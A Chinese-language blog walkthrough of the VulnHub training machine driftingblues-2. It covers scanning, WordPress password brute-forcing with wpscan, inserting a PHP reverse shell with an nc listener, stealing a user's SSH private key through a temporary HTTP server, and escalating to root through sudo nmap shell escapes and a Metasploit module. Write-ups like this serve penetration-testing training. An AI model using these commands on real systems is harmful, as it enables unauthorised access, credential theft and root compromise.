首页 > 其他分享 >vulnhub靶机:driftingblues-2

vulnhub靶机:driftingblues-2

时间:2024-02-27 19:47:02浏览次数:30  
标签:shell 10.9 driftingblues rsa vulnhub 23.50 靶机 id ssh

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.50

三:端口探测

1:ftp

ftp可以实现匿名登录

anonymous

get secret.jpg

得到 一张图片

先用steghide查看隐藏信息

steghide extract -sf secret.jpg

需要密码所以尝试利用stegseek爆破

stegseek --crack secret.jpg /root/rockyou.txt -xf output.txt

并不能爆破出密码

2:80端口

发现一堆图片

1:进行目录探测

dirb http://10.9.23.50

http://10.9.23.50/blog

2:添加域名到host文件中

3:用wpscan探测他的用户名,发现一个albert用户名

wpscan --url http://driftingblues.box/blog -e u

4:爆破一下,成功拿到密码

wpscan --url http://driftingblues.box/blog -U user.txt -P /usr/share/wordlists/rockyou.txt

scotland1

5:成功登入。在后台将index.php文件中插入php-reverse-shell

6:nc开启监听

nc -lvvp 6666

http://10.9.23.50/blog/index.php/52125

随便访问一个不存在的网址,触发shell

2.用python3回弹交互式shell后,在freddie用户下,发现.ssh文件

python3 -c 'import pty;pty.spawn("/bin/bash")'

wget 10.9.23.112/passwd
cp passwd.1 /etc/passwd

权限不允许,试试其他方法

在Home目录下发现ssh文件,可能是私钥,来实现免密登录ssh

cat /home/freddie/.ssh/id_rsa

python2 -m SimpleHTTPServer 9998

wget http://10.9.23.50;9998//home/freddie/.ssh/id_rsa

wget http://10.9.23.50:9998/id_rsa

nano id_rsa

编辑

chmod 400 id_rsa

登录ssh

ssh freddie@10.9.23.50 -i id_rsa

在得到shell之后查看普通用户发现有一个freddie用户

在路径 /home/freddie/.ssh 下发现 id_rsa 文件,将其保存到本地,使用rsd进行登入

使用 rsa 登录ssh原理:

密钥形式登录的原理是:利用密钥生成器制作一对密钥:一只公钥和一只私钥。将公钥添加到服务器的某个账户上,然后在客户端利用私钥即可完成认证并登录。这样一来,没有私钥,任何人都无法通过 SSH 暴力破解你的密码来远程登录到系统。此外,如果将公钥复制到其他账户甚至主机,利用私钥也可以登录。

得到第一个flag

四:提权

sudo -l 之后直接发现可以使用nmap提权

原理(需要注意这里第一种无回显的提权方式测试成功,在输入指令时可以提前写好复制上去,防止输错):

如果允许二进制文件以超级用户身份运行,则它不会删除提升的权限,并可用于访问文件系统、升级或维护特权访问。(sudo)

输入回显被禁用。
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
交互模式在版本 2.02 至 5.21 上可用,可用于执行 shell 命令。
sudo nmap --interactive
nmap> !sh

这时看不到东西

使用 python 切换 bash:

python3 -c 'import pty; pty.spawn("/bin/bash")'

得到第二个flag

第二种方式

利用msfconsole得到shell

msfconsole

use exploit/unix/webapp/wp_admin_shell_upload

show options

set username albert
set password scotland1
set rhost 10.9.23.50
set TARGETURI /blog
run

使用shell -t进入Linux shell

利用linpeas.sh提权信息收集脚本上传至目标主机的/tmp目录,修改权限,并执行该脚本:

脚本下载:https://github.com/BRU1S3R/linpeas.sh

标签:shell,10.9,driftingblues,rsa,vulnhub,23.50,靶机,id,ssh
From: https://www.cnblogs.com/woaishuaidan/p/18037690

相关文章

  • driftingblues-1
    一:主机发现arp-scan-Ieth010.9.23.0/24二:端口扫描nmap-T4-sV-p--A10.9.23.102三:目录探测dirbhttp://10.9.23.102-X.txt,.php,.html,.bak,.md四:渗透测试CharlesBrownsheryl@driftingblues.boxeric@driftingblues.boxL25vdGVmb3JraW5nZmlzaC50eHQ=bas......
  • Raven2靶机
    首先nmap扫描nmap-p--sV192.168.234.0/24有80端口访问一下注:http非加密协议是80端口,https加密协议是443端口发现有网页我先枚举一下子目录这里用dirbdirbhttp://192.168.234.29/去这些目录看一下这里获得第一个flag这里我说明一下,我没有任何技巧都是一个一个打开......
  • NYX(VulnHub)
    NYX(VulnHub)1、nmap2、web浏览3、目录爆破4、发现敏感文件5、ssh连接6、user.txt7、sudo-l8、查找提权方式9、gcc提权10、root.txt......
  • vulnhub-wp DerpNStink:1
    ......
  • vulnhub-wp DC:9
    ......
  • vulhub-driftingblues
    driftingblues1nmap-sn192.168.56.1/24#主机ip发现#端口扫描nmap-A-v192.168.56.108Discoveredopenport80/tcpon192.168.56.108Discoveredopenport22/tcpon192.168.56.108PORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.2p2Ubuntu4ubu......
  • Dr4g0nB4ll - Vulnhub靶机
    Dr4g0nB4ll-Vulnhub靶机主机发现192.168.30.133信息收集└─$nmap-sV-A192.168.30.133StartingNmap7.94(https://nmap.org)at2024-02-2203:26ESTNmapscanreportfor192.168.30.133Hostisup(0.0013slatency).Notshown:998closedtcpports(conn......
  • 靶机Matrix-Breakout 2 Morpheus
    Matrix-Breakout2Morpheus笔记拿到靶机先扔VMware信息收集没其他东西了,于是先在nmap收集信息nmap-sn192.168.0.0/24-snPing扫描-禁用端口扫描发现靶机地址为192.168.0.104,继续收集信息,先给一套组合拳nmap-T4-sV-p--A192.168.0.104-sV:此选项启用版本检测。......
  • vulnhub-DC-6
    ......
  • 【虚拟机新手起步02】4步完成OWASP靶机下载安装。
    OWASP靶机下载安装详细过程一、OWASP靶机下载二、OWASP解压三、OWASP安装四、OWASP启动运行一.OWASP靶机下载:https://sourceforge.net/projects/owaspbwa/files/二.OWASP解压保证磁盘容量有10G左右或以上,解压下载的OWASP压缩包解压缩完成:三.OWASP安装打开......